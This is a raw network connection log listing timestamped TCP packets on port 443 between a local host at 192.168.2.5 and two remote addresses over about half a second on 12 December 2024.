Dec 12, 2024 22:40:36.269773006 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.273015976 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.273080111 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.273144007 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.310038090 CET	443	49801	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.310094118 CET	443	49801	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.310153961 CET	49801	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.310219049 CET	443	49801	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.310277939 CET	49801	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.313591003 CET	443	49797	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.314611912 CET	49797	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.314624071 CET	443	49797	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.314637899 CET	443	49797	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.314663887 CET	49797	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.314697027 CET	49797	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.319474936 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.358863115 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.362483025 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.362545967 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.362561941 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.370404005 CET	443	49802	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.370517015 CET	443	49802	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.370621920 CET	49802	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.376357079 CET	49802	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.376400948 CET	443	49802	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.428323030 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.428385973 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.434438944 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.434497118 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.434510946 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.435333967 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.435395002 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.435412884 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.443543911 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.443595886 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.443600893 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.444438934 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.444493055 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.444506884 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.452709913 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.452760935 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.452764988 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.453648090 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.453706980 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.453718901 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.463882923 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.463933945 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.463937998 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.465416908 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.465477943 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.465491056 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.477751017 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.477812052 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.477817059 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.479193926 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.479264021 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.479353905 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.490509987 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.490569115 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.490576029 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.492011070 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.492063046 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.492080927 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.501331091 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.501382113 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.501389027 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.502928972 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.502985001 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.502998114 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.514133930 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.514184952 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.514194012 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.516001940 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.516171932 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.516235113 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.527787924 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.527842999 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.527848959 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.528501034 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.528554916 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.528570890 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.539644957 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.539695978 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.539701939 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.543080091 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.543150902 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.543167114 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.547832966 CET	49801	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.547899961 CET	443	49801	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.550435066 CET	443	49806	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:36.550652027 CET	49806	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:36.550661087 CET	443	49806	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:36.550977945 CET	443	49806	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:36.551225901 CET	49806	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:36.551326036 CET	443	49806	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:36.551364899 CET	49806	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:36.551390886 CET	49806	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:36.551402092 CET	443	49806	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:36.552103996 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.552154064 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.552159071 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.554250956 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.554303885 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.554316044 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.564327955 CET	443	49805	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.564848900 CET	49805	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.564894915 CET	443	49805	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.564945936 CET	49805	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.565407038 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.565459013 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.565463066 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.566349983 CET	443	49803	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.566771984 CET	49803	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.566833973 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.566854954 CET	443	49803	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.566916943 CET	49803	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.566999912 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.567065001 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.567606926 CET	443	49804	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.568680048 CET	443	49804	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.568737984 CET	49804	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.568768978 CET	49804	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.568783045 CET	443	49804	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.568794966 CET	49804	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.568825006 CET	49804	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.622601986 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.622653961 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.622661114 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.623603106 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.623656988 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.623666048 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.623698950 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.623752117 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.624181986 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.624238968 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.624243975 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.626040936 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.632733107 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.632781029 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.632786989 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.632823944 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.632880926 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.632893085 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.635085106 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.635138988 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.635143995 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.635169983 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.635229111 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.635241032 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.640799046 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.640855074 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.640866041 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.645481110 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.645539999 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.645545959 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.650528908 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.650578022 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.650589943 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.658359051 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.658411980 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.658416986 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.660921097 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.660978079 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.660988092 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.677197933 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.677269936 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.677277088 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.678872108 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.678926945 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.678935051 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.689212084 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.689270020 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.689280033 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.690695047 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.690757990 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.690762997 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.692178965 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.692231894 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.692238092 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.692890882 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.692944050 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.692949057 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.697534084 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.697582960 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.697588921 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.703910112 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.703967094 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.703973055 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.707099915 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.707154989 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.707165956 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.716730118 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.716799974 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.716805935 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.718354940 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.718413115 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.718424082 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.726032019 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.726084948 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.726099968 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.726342916 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.726394892 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.726401091 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.736905098 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.736958981 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.736964941 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.743448973 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.743504047 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.743515015 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.745374918 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.745534897 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.745598078 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.746865988 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.746917963 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.746926069 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.754523039 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.754688978 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.754751921 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.757016897 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.757076025 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.757081985 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.763411999 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.763468981 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.763485909 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.766340971 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.766391993 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.766401052 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.773201942 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.773233891 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.773277044 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.773292065 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.773351908 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.775465965 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.775546074 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.775552988 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.781296968 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.784245014 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.784292936 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.784298897 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.789875984 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.789952993 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.789964914 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.792650938 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.792733908 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.792743921 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.792759895 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.792954922 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.798341990 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.798425913 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.798444033 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.798507929 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.798567057 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.800905943 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.806777954 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.810507059 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.810589075 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.810596943 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.810614109 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.810719013 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.813564062 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.813632011 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.813647985 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.817133904 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.817204952 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.817218065 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.817270041 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.817378044 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.817496061 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.822118044 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.822333097 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.822402000 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.822602034 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.822640896 CET	443	49800	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.822668076 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.822782993 CET	49800	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.823354006 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.823400974 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.823407888 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.827759027 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.827841997 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.827876091 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.827882051 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.827929974 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.832772970 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.837968111 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.838779926 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.840528011 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.840534925 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.840578079 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.843306065 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.847985983 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.848041058 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.848057032 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.852967978 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.853013039 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.853025913 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.858091116 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.858150005 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.858164072 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.859585047 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.859675884 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.859692097 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.864538908 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.864619970 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.864634991 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.871509075 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.871583939 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.871598005 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.874557972 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.874608040 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.874622107 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.883774042 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.883846045 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.883862019 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.886543989 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.886584997 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.886603117 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.889451981 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.889504910 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.889518976 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.894552946 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.894618034 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.894634962 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.899702072 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.899768114 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.899782896 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.904531002 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.904609919 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.904623985 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.909800053 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.909859896 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.909873009 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.914282084 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.914361000 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.914374113 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.918101072 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.918142080 CET	49799	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:36.918155909 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.923007011 CET	443	49799	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:36.923053026 CET	49799	443	192.168.2.5	142.250.181.132
